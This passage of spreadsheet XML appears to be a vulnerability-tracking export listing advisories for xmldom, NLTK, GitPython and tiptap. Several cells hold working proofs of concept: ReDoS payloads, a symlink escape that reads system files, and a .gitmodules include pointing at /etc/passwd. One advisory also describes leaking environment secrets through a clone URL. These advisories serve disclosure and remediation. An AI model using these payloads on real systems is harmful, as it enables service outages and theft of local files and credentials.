t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O35" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P35" s="5" t="inlineStr" /><c r="Q35" s="5" t="inlineStr"><is><t>CWE-625, CWE-91</t></is></c><c r="R35" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.10 until 0.9.12, the requireWellFormed: true serializer validates DocumentType.publicId and DocumentType.systemId with PubidLiteral_match and SystemLiteral_match expressions produced by reg() in lib/grammar.js, which inherit the multiline flag. A complete valid literal on the first line can therefore satisfy the matcher while U+000A, U+000D, U+2028, or U+2029 and breakout markup remain in the emitted &lt;!DOCTYPE ...&gt; declaration. This bypasses the strict-serialization mitigation for the earlier DocumentType injection advisory; creation and direct property assignment remain unvalidated by design. This issue is fixed in @xmldom/xmldom version 0.9.12.</t></is></c><c r="S35" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t></is></c></row><row r="36"><c r="A36" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B36" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C36" s="5" t="inlineStr"><is><t>CVE-2026-83619</t></is></c><c r="D36" s="5" t="n"><v>8.699999999999999</v></c><c r="E36" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F36" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G36" s="5" t="inlineStr" /><c r="H36" s="5" t="n"><v>0.003</v></c><c r="I36" s="5" t="inlineStr" /><c r="J36" s="5" t="inlineStr" /><c r="K36" s="5" t="inlineStr" /><c r="L36" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M36" s="5" t="inlineStr"><is><t>0.8.15</t></is></c><c r="N36" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O36" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P36" s="5" t="inlineStr" /><c r="Q36" s="5" t="inlineStr"><is><t>CWE-1333, CWE-400</t></is></c><c r="R36" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.7.0 until 0.8.15, the release-0.8.x parser in lib/sax.js trims captured end-tag names with the unanchored global expression /[ \t\n\r]+$/g. For an end tag containing a long whitespace run followed by a non-whitespace character, the expression retries from each possible starting position and backtracks quadratically before failing its end anchor. DOMParser.parseFromString() reaches the path under default options, allowing a small unauthenticated XML input to stall the Node.js event loop; the 0.9.x and unscoped npm lines do not contain this expression. This issue is fixed in @xmldom/xmldom version 0.8.15.</t></is></c><c r="S36" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t></is></c></row><row r="37"><c r="A37" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B37" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C37" s="5" t="inlineStr"><is><t>GHSA-2rrw-hpqm-36pv</t></is></c><c r="D37" s="5" t="n"><v>8.699999999999999</v></c><c r="E37" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F37" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G37" s="5" t="inlineStr" /><c r="H37" s="5" t="inlineStr" /><c r="I37" s="5" t="inlineStr" /><c r="J37" s="5" t="inlineStr" /><c r="K37" s="5" t="inlineStr" /><c r="L37" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M37" s="5" t="inlineStr" /><c r="N37" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O37" s="5" t="inlineStr" /><c r="P37" s="5" t="inlineStr" /><c r="Q37" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="R37" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-rrv8-h7p8-rx55. This link is maintained to preserve external references.

## Original Description
NLTK versions before 3.10.0 contain a regular expression denial of service vulnerability in Text.findall() and TokenSearcher.findall() methods that accept user-supplied regular expressions without validation or timeout. Attackers can supply crafted regex patterns that cause catastrophic backtracking, resulting in indefinite CPU saturation and denial of service to all users of the Python process.</t></is></c><c r="S37" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2rrw-hpqm-36pv</t></is></c></row><row r="38"><c r="A38" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B38" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C38" s="5" t="inlineStr"><is><t>GHSA-6r2r-ww24-7h52</t></is></c><c r="D38" s="5" t="n"><v>8.699999999999999</v></c><c r="E38" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F38" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G38" s="5" t="inlineStr" /><c r="H38" s="5" t="inlineStr" /><c r="I38" s="5" t="inlineStr" /><c r="J38" s="5" t="inlineStr" /><c r="K38" s="5" t="inlineStr" /><c r="L38" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M38" s="5" t="inlineStr" /><c r="N38" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O38" s="5" t="inlineStr" /><c r="P38" s="5" t="inlineStr" /><c r="Q38" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R38" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-2f96-g7mh-g2hx. This link is maintained to preserve external references.

## Original Description

GitPython before 3.1.51 contains an incomplete command injection blocklist that fails to account for git's long-option prefix abbreviation feature. Attackers can bypass the unsafe options guard by using abbreviated option names like upload_p instead of upload_pack, which git resolves to dangerous options and executes arbitrary commands.</t></is></c><c r="S38" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-6r2r-ww24-7h52</t></is></c></row><row r="39"><c r="A39" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B39" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C39" s="5" t="inlineStr"><is><t>GHSA-7r39-6q8m-qw68</t></is></c><c r="D39" s="5" t="n"><v>8.699999999999999</v></c><c r="E39" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F39" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G39" s="5" t="inlineStr" /><c r="H39" s="5" t="inlineStr" /><c r="I39" s="5" t="inlineStr" /><c r="J39" s="5" t="inlineStr" /><c r="K39" s="5" t="inlineStr" /><c r="L39" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M39" s="5" t="inlineStr" /><c r="N39" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O39" s="5" t="inlineStr" /><c r="P39" s="5" t="inlineStr" /><c r="Q39" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R39" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-8mcc-hrx5-hvxc. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.</t></is></c><c r="S39" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-7r39-6q8m-qw68</t></is></c></row><row r="40"><c r="A40" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B40" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C40" s="5" t="inlineStr"><is><t>GHSA-j95f-988m-3j2f</t></is></c><c r="D40" s="5" t="n"><v>8.699999999999999</v></c><c r="E40" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F40" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G40" s="5" t="inlineStr" /><c r="H40" s="5" t="inlineStr" /><c r="I40" s="5" t="inlineStr" /><c r="J40" s="5" t="inlineStr" /><c r="K40" s="5" t="inlineStr" /><c r="L40" s="5" t="inlineStr"><is><t>npm:@tiptap/core</t></is></c><c r="M40" s="5" t="inlineStr"><is><t>3.30.5</t></is></c><c r="N40" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O40" s="5" t="inlineStr" /><c r="P40" s="5" t="inlineStr" /><c r="Q40" s="5" t="inlineStr"><is><t>CWE-400, CWE-1333</t></is></c><c r="R40" s="5" t="inlineStr"><is><t>## Summary

`@tiptap/core` contains two quadratic regular-expression denial-of-service paths in its default Markdown attribute parsers. Pandoc-style block attributes use two unanchored greedy expressions that rescan repeated `__QUOTED_0` prefixes. Inline shortcode attributes use another unanchored greedy key expression that rescans a long word-character run when no equals sign follows.

The public `createAtomBlockMarkdownSpec` and `createBlockMarkdownSpec` helpers call the vulnerable Pandoc-style parser; `createInlineMarkdownSpec` calls the separately vulnerable shortcode parser. Using unmodified npm 3.29.2, a complete 20,508-byte atom-block token took approximately 1.40 seconds while an equal-length control took 0.29 ms. A complete 32,776-byte inline token took approximately 2.21 seconds while its equal-length control took 0.19 ms. Current repository `main` commit `5158212970344952dd9918b6a44bfb400d7fb6c1` retains both expressions.

## Block attribute root cause

`packages/core/src/utilities/markdown/attributeUtils.ts` uses both `matchAll` and `replace` with `/([a-zA-Z][\w-]*)\s*=\s*(__QUOTED_\d+__)/g`. The candidate is `'__QUOTED_0'.repeat(n) + '__QUOTED_0__'`. There are no quotes, so the preceding replacement leaves it unchanged. At each `Q`, the greedy key-name expression consumes the remaining word-character run, the required equals sign fails, and the unanchored engine restarts at the next `Q`. This yields `O(n^2)` work, and the cleanup pass repeats it.

A complete public-API proof is:

```js
import { createAtomBlockMarkdownSpec } from '@tiptap/core'
const tokenizer = createAtomBlockMarkdownSpec({ nodeName: 'probe' }).markdownTokenizer
const attack = '__QUOTED_0'.repeat(2048) + '__QUOTED_0__'
const source = `:::probe {${attack}} :::\n`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```

Measured complete-tokenizer timings were 6.23, 23.12, 88.93, 369.10, and 1,400.17 ms at 1,308, 2,588, 5,148, 10,268, and 20,508 bytes. Equal-length controls took 0.07 to 0.29 ms. The directly exported parser took 5,645.71 ms at 40,972 bytes while its control took 0.64 ms.

## Inline attribute root cause

`packages/core/src/utilities/markdown/createInlineMarkdownSpec.ts` uses `/(\w+)=(?:"([^"]*)"|'([^']*)')/g`. For a long word-character run without an equals sign, `\w+` consumes the remaining suffix, `=` fails, and the unanchored engine restarts at the next character. The default inline tokenizer extracts this attacker string directly from a syntactically complete `[shortcode attributes]` token.

```js
import { createInlineMarkdownSpec } from '@tiptap/core'
const tokenizer = createInlineMarkdownSpec({ nodeName: 'probe', selfClosing: true }).markdownTokenizer
const source = `[probe ${'0'.repeat(32768)}]`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```

At 1,032, 2,056, 4,104, 8,200, 16,392, and 32,776 bytes, candidates took 3.24, 12.88, 54.82, 136.91, 557.83, and 2,209.47 ms. Equal-length hyphen controls took 0.02 to 0.19 ms.

## Impact

Applications parsing attacker-controlled Markdown with these helpers can have a browser main thread, server event loop, or worker blocked by a small input. Persisted documents can repeatedly freeze clients; repeated requests can exhaust server-side parsing capacity. Editors that only consume validated ProseMirror JSON and never invoke the Markdown parsing path are not directly affected through document content.

## History and remediation

Commit `35645d94ae9cd73448a564104c2e08f64e9564bc` introduced both parsers on 14 October 2025, first released in 3.7.0. Versions 3.7.0 through current 3.29.2 and current `main` remain affected. Official issue, PR, and repository-advisory searches found no duplicate.

Require a start-of-string or whitespace boundary before both key-value parsers, and preferably replace the multi-pass placeholder and shortcode regex designs with deterministic single-pass tokenizers. Keep quoted values out-of-band so attacker input cannot collide with predictable `__QUOTED_n__` placeholders. Add complete block and inline Markdown-tokenizer scaling regressions with equal-length controls.

Please credit GitHub user `joostgrunwald` as finder/reporter.</t></is></c><c r="S40" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-j95f-988m-3j2f</t></is></c></row><row r="41"><c r="A41" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B41" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C41" s="5" t="inlineStr"><is><t>GHSA-m4f3-g4cq-hqrx</t></is></c><c r="D41" s="5" t="n"><v>8.699999999999999</v></c><c r="E41" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F41" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G41" s="5" t="inlineStr" /><c r="H41" s="5" t="inlineStr" /><c r="I41" s="5" t="inlineStr" /><c r="J41" s="5" t="inlineStr" /><c r="K41" s="5" t="inlineStr" /><c r="L41" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M41" s="5" t="inlineStr" /><c r="N41" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O41" s="5" t="inlineStr" /><c r="P41" s="5" t="inlineStr" /><c r="Q41" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R41" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-rwj8-pgh3-r573. This link is maintained to preserve external references.

## Original Description

GitPython before 3.1.52 is vulnerable to environment-variable exfiltration in Repo.clone_from(). The caller-supplied remote URL is passed through Git.polish_url(), which on non-Cygwin platforms calls os.path.expandvars() on the URL before invoking git clone. An attacker who controls the clone URL can embed $NAME or ${NAME} tokens that are expanded to the values of the hosting process's environment variables (e.g., AWS_SECRET_ACCESS_KEY or GITHUB_TOKEN). The resulting URL, now containing the secret, is transmitted over the network to an attacker-controlled host during the clone attempt, disclosing the secret.</t></is></c><c r="S41" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-m4f3-g4cq-hqrx</t></is></c></row><row r="42"><c r="A42" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B42" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C42" s="5" t="inlineStr"><is><t>GHSA-wv46-xpj8-pw53</t></is></c><c r="D42" s="5" t="n"><v>8.699999999999999</v></c><c r="E42" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F42" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G42" s="5" t="inlineStr" /><c r="H42" s="5" t="inlineStr" /><c r="I42" s="5" t="inlineStr" /><c r="J42" s="5" t="inlineStr" /><c r="K42" s="5" t="inlineStr" /><c r="L42" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M42" s="5" t="inlineStr" /><c r="N42" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O42" s="5" t="inlineStr" /><c r="P42" s="5" t="inlineStr" /><c r="Q42" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R42" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-wvpp-8hx9-p66j. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.58 contains a command execution vulnerability in the check_unsafe_options guard that can be bypassed by combining a single-character kwarg with split_single_char_options=False. Attackers can supply a crafted kwargs dictionary to guarded methods like clone_from to emit a joined token parsed as --upload-pack, enabling arbitrary OS command execution at default allow_unsafe_options=False.</t></is></c><c r="S42" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-wv46-xpj8-pw53</t></is></c></row><row r="43"><c r="A43" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B43" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C43" s="5" t="inlineStr"><is><t>CVE-2026-70626</t></is></c><c r="D43" s="5" t="n"><v>8.6</v></c><c r="E43" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F43" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G43" s="5" t="inlineStr" /><c r="H43" s="5" t="n"><v>0.002</v></c><c r="I43" s="5" t="inlineStr" /><c r="J43" s="5" t="inlineStr" /><c r="K43" s="5" t="inlineStr" /><c r="L43" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M43" s="5" t="inlineStr"><is><t>3.9.4</t></is></c><c r="N43" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O43" s="5" t="inlineStr" /><c r="P43" s="5" t="inlineStr" /><c r="Q43" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R43" s="5" t="inlineStr"><is><t>### Summary
`nltk.corpus.reader.api.CorpusReader.open()` can be used to read files outside the intended corpus root via a symlink placed inside that root. Although NLTK blocks absolute paths and `..` traversal, the current boundary check is only lexical and does not account for symlink resolution. This leads to an arbitrary local file read / filesystem sandbox bypass for applications that rely on `CorpusReader` or `FileSystemPathPointer` to restrict file access.

### Details
The vulnerable flow is:

- [`nltk/corpus/reader/api.py:222`](/mnt/Data/my_brains/test/nltk/nltk/corpus/reader/api.py#L222)
  - `CorpusReader.open()` blocks absolute paths and `..`, then calls `self._root.join(file).open()`

- [`nltk/data.py:398`](/mnt/Data/my_brains/test/nltk/nltk/data.py#L398)
  - `FileSystemPathPointer.join()` joins the requested file ID and checks whether the resulting path still appears to remain under the configured root

The problem is that the check is based on the lexical path after `os.path.normpath()`, not on the resolved path after following symlinks.

Current behavior:

1. `CorpusReader.open()` rejects:
   - absolute paths
   - `..` path traversal
2. `FileSystemPathPointer.join()` computes:
   - `joined = os.path.normpath(os.path.join(self._path, fileid))`
   - `root = os.path.normpath(self._path)`
3. It allows the access if `joined` starts with `root`

This misses the case where a path stays inside the root lexically, but resolves outside the root via a symlink already present under the allowed directory.

Example:

```text
JOINED=/tmp/nltk-root/link/secret.txt
REALPATH=/tmp/outside/secret.txt
```

`JOINED` still appears to be inside the root, but `REALPATH` is outside it.

This is distinct from simple `../` traversal:

- the file ID is not absolute
- the file ID does not contain `..`
- the escape only happens after filesystem resolution of a symlink under the allowed root

### PoC
Reproduced in an isolated Docker sandbox using the local `nltk` clone.

Minimal Python PoC:

```python
import os
import tempfile
from nltk.corpus.reader.api import CorpusReader

root = tempfile.mkdtemp(prefix="nltk-root-")
outside_dir = tempfile.mkdtemp(prefix="nltk-out-")
outside_file = os.path.join(outside_dir, "secret.txt")

with open(outside_file, "w") as f:
    f.write("secret-data")

os.symlink(outside_dir, os.path.join(root, "link"))

corpus = CorpusReader(root, ["link/secret.txt"])
with corpus.open("link/secret.txt") as f:
    print(f.read())
```

Observed result:

```text
secret-data
```

Docker re-test output:

```text
ROOT=/tmp/nltk-root-jjxay3if
OUTSIDE_DIR=/tmp/nltk-out-1kef36e0
JOINED=/tmp/nltk-root-jjxay3if/link/secret.txt
REALPATH=/tmp/nltk-out-1kef36e0/secret.txt
READ_OK=secret-data
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```

Additional impact validation using a system file:

```text
ROOT=/tmp/nltk-root-_h5x4m19
JOINED=/tmp/nltk-root-_h5x4m19/hostfile
REALPATH=/etc/hostname
HOSTNAME_READ=48dafb244af3
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```

This shows that the issue is not limited to attacker-created files outside the root; it can also read existing system files that are readable by the application user.

### Impact
This is an arbitrary local file read / symlink escape issue.

Who is impacted:

- applications that accept attacker-controlled corpus directories, extracted datasets, or package contents
- applications that rely on NLTK corpus readers as a trust boundary for file access
- any deployment where an attacker can place or influence files inside the allowed corpus root

Practical impact includes disclosure of:

- application secrets stored on disk
- local configuration files
- private datasets
- process-exposed files such as `/proc/self/environ`
- system files readable by the running user

The issue is best described as a filesystem sandbox bypass caused by improper link resolution before file access.</t></is></c><c r="S43" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t></is></c></row><row r="44"><c r="A44" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B44" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C44" s="5" t="inlineStr"><is><t>CVE-2026-78675</t></is></c><c r="D44" s="5" t="n"><v>8.6</v></c><c r="E44" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F44" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G44" s="5" t="inlineStr" /><c r="H44" s="5" t="n"><v>0.001</v></c><c r="I44" s="5" t="inlineStr" /><c r="J44" s="5" t="inlineStr" /><c r="K44" s="5" t="inlineStr" /><c r="L44" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M44" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N44" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O44" s="5" t="inlineStr" /><c r="P44" s="5" t="inlineStr" /><c r="Q44" s="5" t="inlineStr"><is><t>CWE-73, CWE-200</t></is></c><c r="R44" s="5" t="inlineStr"><is><t># [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)

- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)
- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` ("Disable merge_includes in config writers"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).

That fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.

`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.

Once opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `"File contains no section headers.\nfile: %r, line: %d\n%r" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.

## Root cause
Parity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules/&lt;name&gt;/config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)

## Exploit path
1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:
   ```
   [include]
   	path = /etc/passwd
   ```
   (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).
2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.
3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.
4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).

## Impact
Non-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` ("Blind local file inclusion", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).

## Preconditions
- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, "audit this repo" utilities — exactly the class of application GitPython itself is built for).
- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.
- No authentication/role requirement inside GitPython itself.

## Evidence
- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.
- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.
- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.
- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.
- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.
- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.

## False-positive check (adversarial re-read)
- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).
- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.
- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.
- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.

## Remediation
Pass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.

## Confidence
High. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).


## Proof-of-Concept source (`gitpython-003-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped
inside a cloned repository -- can contain `[include] path = &lt;any local path&gt;`.
`Submodule._config_parser()` builds the parser used for `repo.submodules` (and
other submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`
without passing `merge_includes=False`, so the class default `merge_includes=True`
is inherited. GitConfigParser then opens the target file; if it isn't valid
git-config syntax (true of virtually any non-gitconfig file), Python's
`configparser.MissingSectionHeaderError` embeds the file's first line verbatim
in its exception message, which propagates out of the ordinary, read-only
`repo.submodules` call -- a non-blind local file content disclosure primitive.

Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-003-poc.py &lt;workdir&gt; &lt;target-file&gt;

Benign: reads only the given &lt;target-file&gt; (defaults to a throwaway secret file
created under &lt;workdir&gt; if omitted) and never writes/exfiltrates it anywhere
except printing it locally to prove the primitive. No destructive action.
"""
import os
import subprocess
import sys


def main():
